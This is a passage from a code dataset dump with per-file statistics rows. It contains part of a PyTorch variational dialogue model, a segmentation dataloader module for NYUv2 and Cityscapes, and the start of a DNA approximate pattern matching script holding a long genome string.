var_posterior = self.softplus(self.sent_posterior_var(h_posterior))
return mu_posterior, var_posterior
def forward(self, sentences, sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_inference = encoder_hidden[:, 1:, :]
encoder_hidden_inference_flat = torch.cat(
[encoder_hidden_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_input = encoder_hidden[:, :-1, :]
# Standard Gaussian prior
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
conv_mu_prior, conv_var_prior = self.conv_prior()
if not decode:
if self.config.sentence_drop > 0.0:
indices = np.where(np.random.rand(max_len) < self.config.sentence_drop)[0]
if len(indices) > 0:
encoder_hidden_input[:, indices, :] = self.unk_sent
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
input_conversation_length + 1)
# context_inference_hidden: [batch_size, num_layers * num_directions * hidden_size]
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
log_q_zx_conv = normal_logpdf(z_conv, conv_mu_posterior, conv_var_posterior).sum()
log_p_z_conv = normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
kl_div_conv = normal_kl_div(conv_mu_posterior, conv_var_posterior,
conv_mu_prior, conv_var_prior).sum()
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
context_outputs, context_last_hidden = self.context_encoder(
torch.cat([encoder_hidden_input, z_conv_expand], 2),
input_conversation_length,
hidden=context_init)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
sent_mu_posterior, sent_var_posterior = self.sent_posterior(
context_outputs, encoder_hidden_inference_flat, z_conv_flat)
z_sent = sent_mu_posterior + torch.sqrt(sent_var_posterior) * eps
log_q_zx_sent = normal_logpdf(z_sent, sent_mu_posterior, sent_var_posterior).sum()
log_p_z_sent = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
# kl_div: [num_sentences]
kl_div_sent = normal_kl_div(sent_mu_posterior, sent_var_posterior,
sent_mu_prior, sent_var_prior).sum()
kl_div = kl_div_conv + kl_div_sent
log_q_zx = log_q_zx_conv + log_q_zx_sent
log_p_z = log_p_z_conv + log_p_z_sent
else:
z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(
torch.cat([encoder_hidden_input, z_conv_expand], 2),
input_conversation_length,
hidden=context_init)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
z_sent = sent_mu_prior + torch.sqrt(sent_var_prior) * eps
kl_div = None
log_p_z = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
log_p_z += normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
log_q_zx = None
# expand z_conv to all associated sentences
z_conv = torch.cat([z.view(1, -1).expand(m.item(), self.config.z_conv_size)
for z, m in zip(z_conv, input_conversation_length)])
# latent_context: [num_sentences, context_size + z_sent_size +
# z_conv_size]
latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs, kl_div, log_p_z, log_q_zx
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
return prediction, kl_div, log_p_z, log_q_zx
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
# conv_mu_prior, conv_var_prior = self.conv_prior()
# z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
encoder_hidden_list = []
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
encoder_hidden_list.append(encoder_hidden)
encoder_hidden = torch.stack(encoder_hidden_list, 1)
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
to_var(torch.LongTensor([n_context] * batch_size)))
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
context_hidden = context_init
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction *
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
encoder_hidden_list.append(encoder_hidden)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(torch.cat([encoder_hidden, z_conv], 1),
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.sent_prior(context_outputs, z_conv)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init, decode=True)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(torch.cat([encoder_hidden, z_conv], 1),
context_hidden)
samples = torch.stack(samples, 1)
return samples
| 50.637755 | 171 | 0.558227 | 5,142 | 49,625 | 5.04823 | 0.051536 | 0.061099 | 0.023577 | 0.01618 | 0.862547 | 0.830457 | 0.800639 | 0.775715 | 0.751368 | 0.729948 | 0 | 0.006621 | 0.360846 | 49,625 | 979 | 172 | 50.689479 | 0.811779 | 0.261723 | 0 | 0.719101 | 0 | 0 | 0.000305 | 0 | 0 | 0 | 0 | 0.002043 | 0 | 1 | 0.035581 | false | 0 | 0.020599 | 0.001873 | 0.099251 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba11bc035846d32120914bc5efb5c7669c0026b3 | 2,868 | py | Python | dataset/__init__.py | FLHonker/MKAT-code | 39260ae70d5a304892031da2013a1be48d118f03 | [
"MIT"
] | 1 | 2022-02-28T15:16:35.000Z | 2022-02-28T15:16:35.000Z | dataset/__init__.py | FLHonker/MKAT-code | 39260ae70d5a304892031da2013a1be48d118f03 | [
"MIT"
] | null | null | null | dataset/__init__.py | FLHonker/MKAT-code | 39260ae70d5a304892031da2013a1be48d118f03 | [
"MIT"
] | null | null | null | from .cityscapes import Cityscapes
from .nyu import NYUv2, NYUv2Depth
from utils import ext_transforms
import torch
""" Segmentation """
def get_dataloader(args):
if args.dataset.lower() in ['nyuv2']:
train_loader = torch.utils.data.DataLoader(
NYUv2(args.data_root, split='train',
transform=ext_transforms.ExtCompose([
ext_transforms.ExtResize(args.base_size),
ext_transforms.ExtRandomCrop(args.crop_size, pad_if_needed=True),
ext_transforms.ExtRandomHorizontalFlip(),
ext_transforms.ExtToTensor(),
ext_transforms.ExtNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])),
batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers, drop_last=True)
test_loader = torch.utils.data.DataLoader(
NYUv2(args.data_root, split='test',
transform=ext_transforms.ExtCompose([
ext_transforms.ExtResize(args.base_size),
ext_transforms.ExtToTensor(),
ext_transforms.ExtNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])),
batch_size=args.test_batch_size, shuffle=False, num_workers=args.num_workers, drop_last=True)
elif args.dataset.lower() == 'cityscapes':
train_loader = torch.utils.data.DataLoader(
Cityscapes(args.data_root, split='train',
transform=ext_transforms.ExtCompose([
ext_transforms.ExtResize(args.base_size),
ext_transforms.ExtRandomCrop(args.crop_size, pad_if_needed=True),
ext_transforms.ExtColorJitter(brightness=0.5, contrast=0.5, saturation=0.5),
ext_transforms.ExtRandomHorizontalFlip(),
ext_transforms.ExtToTensor(),
ext_transforms.ExtNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])),
batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers, drop_last=True)
test_loader = torch.utils.data.DataLoader(
Cityscapes(args.data_root, split='val',
transform=ext_transforms.ExtCompose([
ext_transforms.ExtResize(args.base_size),
ext_transforms.ExtToTensor(),
ext_transforms.ExtNormalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])),
batch_size=args.test_batch_size, shuffle=False, num_workers=args.num_workers, drop_last=True)
return train_loader, test_loader
| 55.153846 | 110 | 0.57113 | 305 | 2,868 | 5.157377 | 0.203279 | 0.181818 | 0.040687 | 0.050858 | 0.830896 | 0.830896 | 0.824539 | 0.824539 | 0.824539 | 0.824539 | 0 | 0.055183 | 0.323919 | 2,868 | 51 | 111 | 56.235294 | 0.75606 | 0 | 0 | 0.711111 | 0 | 0 | 0.011236 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.088889 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ba280a798058ffb4d949d0d78f11ba66fe59c959 | 15,823 | py | Python | Introduction to bioinformatical algorithms/Finding OriC/Approximate Pattern Matching.py | peterforgacs/bioinformatics-scripts | f4a497b84bc3cf0c295b7e6b506b9dd9c88e7881 | [
"MIT"
] | null | null | null | Introduction to bioinformatical algorithms/Finding OriC/Approximate Pattern Matching.py | peterforgacs/bioinformatics-scripts | f4a497b84bc3cf0c295b7e6b506b9dd9c88e7881 | [
"MIT"
] | null | null | null | Introduction to bioinformatical algorithms/Finding OriC/Approximate Pattern Matching.py | peterforgacs/bioinformatics-scripts | f4a497b84bc3cf0c295b7e6b506b9dd9c88e7881 | [
"MIT"
] | null | null | null | import timeit
start = timeit.default_timer()
pattern = "ACCGCTGTC"
string = "GAGTGCTCGATCCGGAAGAGTGAATCCTTTCAGAGCCCAACCCTCACGTCAATTAACTCCACAGAGATAAGTGCAGCACGTGGGTAGTTGCTGGGGGCATACCATGCCGCAGTCGAATTTTCCTTAGGACCCAGGGACTGGTCTTTACATAACAATATATCCCCTTACCTCGCCAACGGTAATCATTAAGTAAATCACACTCCATATGTGGGAAATCTATCTCTGGTTAGAGGCGAAGATCGATACGATAAAACCTTTACCCAGGGCAAACTTCAGGCATGAACTACCACAAAGACGAGACGTCCTCAGATAGTGAGAGTGAAAAATATGCGTGAACGCCTGATACCTCAAGGACCAGCGTTGGCAGGTATAGCAAACTATAGAAGACGCAGTAACGCGCCATCTGAAAGTTGTCGTGAATATTGGTGACAGCCTTGTCCGGGGGTCCGGATTCCAAGGCCAGCGAACCACTGAGTGGCTCTCGCGGGTAGAACTAGGATTCGTTTGACCACACCCGTGAAGTAGGTAGGTCCTTCGCACGGTCCCAACCAAGTCGTCTTCACTTAGTTTTCCCATCGAGATGTATAGAAGAAAGTGACATTTGAAGGTTAACTGGACTTAAACAGCGCTCTACACCTCAGGTCGCGTTCGTAATAATACCTTGTTCGGGGCAGAGAGTTTGGTGACTAAGAGGCACACGGGGAGATCCGAGCAATCGATCCCTATTCGGAATGGAATGCTCCCTTCAATGTCGCCGCTTAGGTACCCACGTACTGGCGCCTAACACGATTAGAGGTGCGTCTAGGAATTGTCGACTCAATGGCGTAGTTGCCTGTCTTTAGGAGGTCGTAGCTGTGGCCCTCGTCCTCGTCATCCGAGCTCTACCTTGGCTTAGTGGTATCGCATACAATAGAGTTGGAGCTGTATTACTAAGAAGTGGGCCGCATCAATTCTAGAGTACCGAACTAAACAGTCCCCAACGGTTGAAATATTGAAAATCCGATTGAACACTGCGAGTTTCCGTAGTACCGATAGTGTAGTGCGAGGCCCCTATGTGAACGCCGCTCCCGTGGACGTTAGAATTTCTCTGTTGCAACCTTGCGTTGGTGCCCTATTTGCATTCGTTCCACGGTTAGCCAACAGGATCAACTGAATTCTTTTGGCGAAAAGTGCGTTCAAACAGGTGAGTTAAGACGTATATTTCAGATTGAGAATTGGCTGTTACCGGGATGCAGGTGGCCAGGCGGTGTAACTAACCACGTTGGCGCTTCTGTTCAGTAAAGCGCCTCTGAGGGTGTCGCTCGAGGAGAGGCTCTCTGGGTGTGTGGGCCTTATATGATTGATTGCGCGTGACTATAAAATAGGTAGCGGTATCTGCACGTGGCACGGTTATTGGACGATCTGTGTCTCGATTTTCATACCGACGCTACGGACGAAAGACTAACGGAAATCTAAGTAACGAAATTAGATATTGAGCAGTCTTCGATCCCACTACGCCGGGGTATAAGATAAGACTCCACTAGTCGGAAACAACGTACTGGTACGTAAGACGACGCCCGTTTAGTTTCAGGAGAGAGCTACTGGTCTGATGCAATGTGGTCCTTCACCAATGTACAGCGCAGTGGGTTATGTTGGGGCTATAATTTGCAAACTCTTCGTCGGGCCCTGATCTGGCCCTGAGGGCGTGTTGATCATATCGCCGAGTCAAATCAGGAGGCATAAAAGCTTCCTAGTCTTAGCTAACAGGTCTTTGCCCCCATATCCGTGATTGCCTTAGGCGGGACCGGTCGCATCAGAGAGCAGCTTAACTGGAACAGCGTAGTTACTCTGGCTCTAACAGACGCTGCAATAGATCCAGGAACCTCCGCCGTGTCGGGGTCGCTTGGTCGCTTCCCCTGTGAGCATGAGAGAATAAATACGCACGCAAATGTGCCGCATACCCTGTGCTCTTTCAGACTTTGGACTTTGCCAAGTCGGTAAAAACCTTGAGGCATGCCTCCGAACCTTATCCAGGTAACCCACTATACGTTATCAGTCATTCTACTGTGTACCACTGGGGTTGGGCCTCAGTAATACGTGGCAGGTAGGAACGAAACGTCCTCAAAACAACTCTACGCCTTTCTGAGGATGTCAGCTGTTAGCAAACCCGTGACGTTATAATTACGTAGCTTCCGCCCAAGAATTTAGCAACAATTACTTTACTCGTGACGTTCGATGGGATTTCGGAACCGTCGGGGGGAAGATGCAATTGACCAGCCTACGCAAACATCTGTCTAGTCAAGCCCGTATTAGTCTATAGATCTATGATTGCATCGCGCCGAATAACCTTGTTACCTGTAGGCGAGGAGACGGAAGTAGGCCGCGGGCCTAGTCGTCGTCGCCCGAAAACCGCTAACGAACGCTTAACCCTACGACGTAAGGCGATTAATGCCCCGCTTGATCGTTGTACTAAGAACAAGATGGCGAGCGCATGATTAATCTTGCGGCTTTTCACTAAAACTCCTGTCATCTAGATAGAACTGTTCTGTTTTCGCGAGGAGTATCTCGTGACCTTTAAGCAGTAGTAACATATCCGCAAAGATAACCTTCCGTATTAATTGAAACGAGGCACGTGTGATAACGATGGTGTTTCTCATGGGGACCCTTTCTAAGACGCATAAGAGCCGCGCCGGGTTCAGTAATAAGGTATAGAGCAACATAATGAAATCTTTCAACTGCACAATGCAGTGAGTGTCTACGGGGGGAGAGCATAAGGATCTTACAATACTGCGCCGAGCAGTCTGACATGACCGAGAACAGTGTGGGGGCGTGTGGGGTCCTTGGGCTCGCGCAGCCCACTACCGGACCGGGCGTTCTAGATAATTAGCGACATTTACGTCTGTGTCGACCTACAGACGACCGCAAACTAACCCCTTGGAGTATACTAATATCAACGCACTCAATACGATGTATACTGCGCATTGACGGTCATAACCTGTCGAAATAACTACTAACTACAACCCACCTGGATGCTAGACCGATCAGCAGAAGTATCACACTCCTAATCATATGAAACTAGGATCTAACCAAGACACCAAGCTGTCTGTCCTTGAGACTAGCTTAGCTTGTCTTTAGACCCCCCTAACACCGCAGCCACCATGTACACGCCAACCCTAGGGCGGGTGCTGGTCTAATCGCACAACACGCTCTCAAGACAGTGATGGATCGAGCCGCTCCCAAAGGCCGAGACCAAGTTAGACGACTCCGATGTCACTACGTGGATGAGGGATCGGATTTTCTGCTACTATGTAGTTGAAGGCATACTTAAACGTATATGCATGCACATGGCCAGTAGGGTGAGGGTCTATTATGATCTATTAGCGTGGTTTGGTGTCACGGATCTCATAAGCATATTGCAAGATACCCAAAGGGGCCTTAAGTACCAATCAAACAACATGGCCGGTGCCGATCCAGGATACTGTCACAGGCGTCGGGAGTGGCTGCTCGTTTAGCGGTAAGTGGGCACCTGAGAACTGCGTTACGTTCTCAAAGAAGGAATCCATGACGTACCATGTACTCCAATGGTCACGCTCCTTTGTCTAGTCAGCCTTACGTTACTACGGCGTTCCAACGCTAACTCTATGTCGAAAAACTGTCTATCGACACGTTCAGAAGTCATCTCTTCGGCTAGGATCGGTACCATAATCGGTCGACGACATGGTTCAGGAGAGACGATATCTAATATAAAAGGTATTAAGACCAATGCAACTCATAAGTCGGGAAGTGTTCGCCAGAAGCAACACCACATAATCGCTCATGACTTTATTTCCTATTCTCGGGGAGTCTGCATTAATGAAGAGGCGGATCACATTGCGCTCGCCACGGTAATCGTCTCCCGGCTCAAATATGTATTTATGCTAAAGGCCGCGGTACGATCAGTAATCTATCCGGGGCCTTTAAGGATTTTCGAATCCTTCTACACACAGTAACATACCGCGTAGCACGGAGGCACTTACGTACATGACTCACCATACCATTGCAGGGCTTCTAACATAAAAGACGTCAATATCAAATTCCGTCGATCTCATTCTAAGTGTTACAGTAGTCTAACAGGCCATCTTAGGTGAGGTTAATGGTTTCTTATGTATTATTGGAGGCGTTAGAGTCTTCGCGTTCCGATAGTGCGGCACGGGTGATTATGAACTCTTGATATCTCAAATCCCGCTTAGAACGACCAGTAAAGTTGACCGCTCCTCTAGTATAGTATGTGTTGGTGATCCACCACTTGCCATACAGCCTCTCTCGAGCACATTCCAGGCACTCGACAAGCCCTTGGCACCGCACCCCGTCAGGAAGGTCGCGTATAGCGCCCGAAAACAGCCCGGTCGGCGGTGGGAGGTCATGGGGGAGCCGCGCCCGTTCCTTGCATTCTATACAGGTGCGCTGAGGCTATTCCCGTAAATCGCCGGGATATTTTCGTTAGAACGGGTTCACTTATTACGTAAACAGTGCTTATGTGATTTTCATAGTTGGTGCCGAAGCGCAATATAGAAGGCCTTTGCGGCTAATAATCCTTACTTCGAAGCAGGCCTCAATGTGAGTACCGTATTTCAGATGATGGTACTTGAGGTCCCATTAAAACTCATTTTAAGAATGTATAGTGGAGACGGGCACTGCACACGGTGGGGTACAATACTACGGCATTTACACCGCACAATTCTTCAAGACGTCCATCTCCGGTGATGCTTCACACAGAGCCTAGTGGCTCTCTATGCGTCCAGGTGGGGCGATACACACAGTCCACAGCGTCGATGGCGAACCGGGGGTACGTCTGACTCAACATAAGTACTGCAGGCTGGAATTTGGACCTGGTTGTTCTAATTCTGCCATGGCGAAATGTCCGTGGGTGAGGAACAGTTGAGAGCTCGGTTCGGGGTGCGCAATTAGTTACACTTTGCTCGTCCGATAGAAGCGTGTCACGCGCCCGCATCCGTAAATTAACGTTAATAGTATACGCGGACCAGGAACTGAGCCTAACGCGTTAGATGGCTCACATCCACAAAGCGATCTCACCGTCATCGCGATTAGATCGTAACGTTCCGAACGTTGGATCAGAGCTCCAAACTTCCTTTCGCCCGGCTAGTTGCAGCTGCCATTGTCAACGTGCGGCTTTAAGTAACCGCACTCAGGATCTTATGAGTCCGGTTATCAACCTGGTCTTCAGGACGGGCAGCCCTGGTCACCGAGACTTTGGCAGGGTTGAGACGACGAATGGATCTTACACTGTCTAGACGCCGAGGCCATCCTTGTCTTGAGAGCAGCTCGGAAACCAATAATTGGGCCATTACCCTTGTGTCACGTGAAGATCTGGCATGGCTAAGCCACTTCCCCTCTGGGTAAGAACTGAGCGAGATAATTACGGGAGTCCGGCAGCCCACTCCGAGGACCACCTCACTTGACTCATACCTAGTCCTGCCGTAATCCCCTAACACCATCGTCTATTCATACCTGAGTAGTAATAATCTACGAACAGCGGTTTGGTATAGGCCTAGCGCGCAACCGAGCCAACGGAAAGTGCCACCATCGGGTAATACTTACTCGATGATCAGAGGTGCTCGTGGGGGTAAATCGGGGCTCTCCGGATTCGACCATAATGAATATCCCACATCCGAAATCCATTATAAGCATCCCGTTCTAGTTCGGATGACTGGATCGATTTCTGGAGCGATACCTTTCAAAGAAGCGGCGTCGTTGTAACGTTGAGGAGGGCGCCCGTGAAAATATCCCACCCGAGTTCATTGCTGCGCTCCGATCAATACAAACTCTGTGTCGCATAGTCGTGATTATGTCTCGTCCTATAAGTTAAAATTAACTTGAAATAGTTAAATGAGATATATGGATTCATCCTGGCAATAACATGTCGAGTGCAACCCTTATGGTACCAGGGCAGTGCCCACGGTCTTTCGGATAGATGGCCGACTACTCATGACGGCGAAATGATGTCGGATACTACTCCGCGGTTAACGGATGGCGCAAATCGAGTTGTTGTTAAGTTTACCCCACGGACTCGGGCGATTGACTCGCGAAACATCCCGCCCGCAAACCACTAAAGCGACAGGAACAATCGCTGATACAAAGGCTTTTTCGTCGTAGATAGCCTGAAAGTTGCCTCCTTTGGATATACAGAGTGCCGCTCTATATTCCTAGGAATATCCATGAGCTCATCTCAATTGCATCACCCTTTATCTGGCCAACTGGCCTGAAAAAGCGCGGATCCACCCCAGATCAGCCTCCAGTTTCAACTGAATCCACTTTCCGTATTAGCCGGAAAAGAAGTTTGTTCTCGGCAACAGGAGACTGCTCAAAGTAAGCGTCCACATCCGGATCAAAACGCTTAGAAGATGAGATGAGTTCCGACTAGAATTATGTAATGCAATTCTCTAGACGCCGAATAATCTACTGGACACAACCGAAACGTTTACACCGGCGAGATTTCTGCACAGATGAATCGCCAATGGAGAACATCATGGACATTAGCGTAGTTCACTCCCAATTATAGCAACGCGTCCTCCAACTAGCCTAACGATATCTGGGTAAAAGTGTTGCGGAATAGACGGGCCGTGTTCTGCCTTTAGGCATGGCAAGTGATAGGGCCACGTCTCATCGCGTATCTAGTTAGTATAACACGCACTGGCATTGCCCGTCATACAGGATTGCAGTTCTGACGACAGCAGGTTTAAAGTTCGGCTCTCAGCGTATGTCTTTACTAGACTAGGGTACCGACGGGTACTCGATGCTCCCCATAATATGGATCGGCCCAGCTCAGTATTTTGAACGCATTAGCTGGATTGAACCGCAGAAATTTACGTTATACCACATCGTAATACACCTACTTGCAGGCACTTCAATGGCTCTCTTTCTTGATCGATCCCGATGGCCTCATGGCTTCTCCCGTGTTTGAGGGCATAAGAATTCTGAGAGCCACGCGCACGGCTTTTGGCCTAGTAGGAACAATGAAAATAAGTGTGCGTCACTCTCGGTCATTGTTCGTAGGTTCGATTAGCTCATGACGGTGCTATTGCGCCGTTGTCTAAGAATTGCCCTGAGCCGCTTACAGCGTCTGAAGTCAGTCATGCACAGCACTATAGCATACGCCAGGGCCTTGAACTTTCAGTTGTCAAGGTAGTGAATCGGAATTGCGCCGGAGGTCATCGTCTCAGGAAGCGTCCTCGACGATCTAGTATTATTAAAAGAACAAAGGACGAGCGGCCCCGAAAGGGCACATCTTGCGTCGACAAGATTACGCACTGAATCACTTTGACCCTGGAATGGCCTGGACCATGCCCCCCGAGTTTGCTCCTAAGCTGTTGATAGTACTTGCCCCACGCTGGGGGAAGAAGCTTGCAGCACTCTGAGTTCGCGTCCGTACGCCATAGTTCCGCCCCCAAGATAGTTTTCCGCACGGTGCGGAACACAACTTATCTAAACGACTTGTTGGCTTTGTCATTCCAATCGCATGCACTGTTAACTGGCCCTGTTGACGCACGCACTAAATAAAATCTTTGAAAAATGGGATCCCTGGACACTGTGCACTTCTGCTGTCAAGCCTAGGTGTTCGCCTAGCCAGGTGCCCGATCAGAGTTATGTGCATAACTACCGATAGAAAGGACCTCATCATGATGTAGTATGGGCTTTAAAAGTGCGCTGATGCTACGATTGGTATCGTGCCACTTCATAATAGATTGGAGGTTACGAACAAGAATCGACCGAACACACGCTGTAGTCTAAAAAATGCCTACAAACGTGTGCACGCCCGCAATGGCCAGCGAAGTCCATGGAGATTGAGAGCAGTTCGGAGAAAATGGACTCATTTATTGTCTAAGTGCTTTGCATGTACTCCTTCAATCCTTTCGAAAGTCACGATCGAGAAAAAAACGCTCGGAGATTCCAACTGTACGGTGAGTCCACCCAACGCAGAACAGTCGATCTAGTCCCAGGCCTATACCAGGAGCCTTCTAGGTGTACCGTTAGAATGCAACCCAATACTGCCTCAAGTGCGAAGAGTTCAGGCGCTTGTACAGATAACGGTCCCGTATATCCGAACAGTAGTATGCGGCCTAGCTCGGATGCACGGCCGAGACTTAACCTCATGTTAGCATGAAAGAGAGGCTACACGGAGAAAAGCTGCCCACCTCTACAACATCCAACAATTGACGATCAAGACCAATCTTCCCACGACTCGGGAAGACATGAGGCACAGGTGGTTCGCTATACTTGGAGTACTCCGGCGTCATGGCCTGTAACTTGTAACGACAGTGTGGTCACGTCAAGGAGCTATCAATAACCACGCCAAGTTAAGAATTGCCAACTCCGGGATACGGTAAGCCCGCGTGCAGGGGGGCAACACGAAAATCAAACAACATTACTCTGACAAGTCGCTTAGTTTATCTGATCGAGAATTTATGGGGTTTTCTGTGGCGATTAACCGCTCCACCATTTATAGAAAGTGTTAAACCGCCGATCCGATCTTTCCTTTCCAGATAGTCGGGACAAGTGACCGGATGTATGTACCCGTACCAGGGCGTGGTAGTCGGTCGTTCAATCTGGATAGGCCCTCGGAGGTTGTCCCAGTGCATGAACGCATAATAAATTCATGTCAATACAAAGCATTCGGGCGTCCGTGTAGTCACTCCAGCCCGTTTTGCTATCACGAATTGCGTCTTGAATGGTTGTCAGTGCCCTTTTAAATGAGGAAAATCTTTCTTAATAACCTCACCCTTTCTAAAAAGGGCAGTACGCATCTCCGTGCGGAAGGAATTTTCAAAATTTCATGCCAGCTTCTACGCACTCTTGCGTCGTAGCCAGCACTCCGTGAGCTCCGTACCAGCGGGGCGGGAGCGCAGTCTGATAAATTTGGGTTGTAGCCATCTTAATAAAAAAAATCGAAGCAAAAACGGATCGAGTGGACGCACGAGTATACTGGACACACA